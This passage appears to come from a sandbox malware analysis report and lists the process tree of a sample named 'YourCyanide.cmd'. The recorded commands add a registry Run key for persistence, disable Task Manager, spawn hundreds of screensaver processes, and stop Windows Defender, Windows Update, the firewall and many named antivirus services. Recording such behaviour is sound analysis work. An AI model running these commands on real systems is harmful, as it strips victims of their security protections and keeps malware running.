  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_17507_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f
  2⤵
  - Adds Run key to start application
  PID:3852
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2152
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3788
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2540
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2468
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4464
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3220
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2172
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1472
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:896
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:564
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4652
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4336
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:112
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2468
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3152
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3808
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3688
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2344
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1132
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3312
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1544
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4764
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4336
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1460
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:112
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2464
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4432
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2632
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5036
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2140
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1616
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3220
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3196
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2896
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3172
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4736
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3936
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1724
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3148
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2960
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1132
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4932
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1668
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2564
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1352
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4432
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1916
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4140
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4352
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3124
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1388
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4548
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4464
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3612
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1912
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3344
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4736
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2776
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2928
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1472
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4312
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:796
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1780
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2008
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4336
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5032
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2140
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2832
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3704
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1328
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3124
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3788
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1932
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2780
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2140
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3220
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1724
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:796
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:864
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4360
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2736
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2292
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2320
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4520
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1776
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3192
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3808
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1176
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:444
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3688
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4660
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2928
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2000
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4352
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1744
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1480
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1004
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1032
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2632
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1824
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3148
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2540
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2468
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1176
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4328
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3004
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:4900
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:2832
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:4980
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:1868
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  PID:4056
- C:\Windows\system32\net.exe
  net stop "Security Center" /y
  2⤵
  PID:4116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Security Center" /y
    3⤵
    PID:1964
- C:\Windows\system32\net.exe
  net stop "Automatic Updates" /y
  2⤵
  PID:3668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Automatic Updates" /y
    3⤵
    PID:4932
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:5012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:4112
- C:\Windows\system32\net.exe
  net stop "SAVScan" /y
  2⤵
  PID:4652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAVScan" /y
    3⤵
    PID:2652
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Firewall Monitor Service" /y
  2⤵
  PID:4756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
    3⤵
    PID:4492
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto-Protect Service" /y
  2⤵
  PID:3676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    3⤵
    PID:2348
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:4260
- C:\Windows\system32\net.exe
  net stop "McAfee Spamkiller Server" /y
  2⤵
  PID:3544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
    3⤵
    PID:1032
- C:\Windows\system32\net.exe
  net stop "McAfee Personal Firewall Service" /y
  2⤵
  PID:2464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
    3⤵
    PID:1904
- C:\Windows\system32\net.exe
  net stop "McAfee SecurityCenter Update Manager" /y
  2⤵
  PID:756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
    3⤵
    PID:1368
- C:\Windows\system32\net.exe
  net stop "Symantec SPBBCSvc" /y
  2⤵
  PID:784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
    3⤵
    PID:228
- C:\Windows\system32\net.exe
  net stop "Ahnlab Task Scheduler" /y
  2⤵
  PID:1116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
    3⤵
    PID:5036
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:2020
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:3116
- C:\Windows\system32\net.exe
  net stop vrmonsvc /y
  2⤵
  PID:4980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vrmonsvc /y
    3⤵
    PID:1616
- C:\Windows\system32\net.exe
  net stop MonSvcNT /y
  2⤵
  PID:3688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MonSvcNT /y
    3⤵
    PID:2672
- C:\Windows\system32\net.exe
